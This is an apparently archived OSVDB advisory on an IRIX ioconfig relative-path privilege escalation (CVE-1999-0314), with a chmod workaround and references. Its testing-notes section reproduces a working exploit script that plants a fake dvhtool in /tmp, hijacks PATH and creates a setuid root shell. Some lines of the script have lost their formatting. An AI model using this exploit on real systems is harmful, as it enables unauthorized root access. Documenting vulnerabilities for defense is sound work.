IRIX ioconfig Relative Pathname Privilege Escalation

1998-07-20T00:00:00
ID OSVDB:6788
Type osvdb
Reporter OSVDB
Modified 1998-07-20T00:00:00

Description

Vulnerability Description

IRIX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user tricks ioconfig, which does not use absolute paths in its system calls, into running arbitrary programs. This flaw may lead to a loss of integrity.

Solution Description

Currently, there are no known upgrades or patches to correct this issue. It is possible to correct the flaw by implementing the following workaround: remove permissions on the vulnerable ioconfig program.

/bin/chmod 500 /sbin/ioconfig

Short Description

IRIX contains a flaw that may allow a malicious user to gain access to unauthorized privileges. The issue is triggered when a malicious user tricks ioconfig, which does not use absolute paths in its system calls, into running arbitrary programs. This flaw may lead to a loss of integrity.

Manual Testing Notes

!/bin/sh

Irix 6.4 ioconfig xploit - Loneguard 04/12/97

Simple xploit making use of stupid system calls to programs without using

a path. This works on both /sbin/ioconfig and /sbin/disk_bandwidth.

cat > /tmp/dvhtool << 'EOF'

!/bin/sh

/sbin/cp /bin/csh /tmp/xsh /sbin/chmod 14755 /tmp/xsh EOF /sbin/chmod 700 /tmp/dvhtool PATH=/tmp:$PATH /sbin/ioconfig -f /hw

References:

Vendor URL: http://www.sgi.com Vendor Specific Advisory URL ISS X-Force ID: 1199 Generic Exploit URL: http://www.securityfocus.com/bid/213/exploit CVE-1999-0314 CIAC Advisory: i-076 Bugtraq ID: 213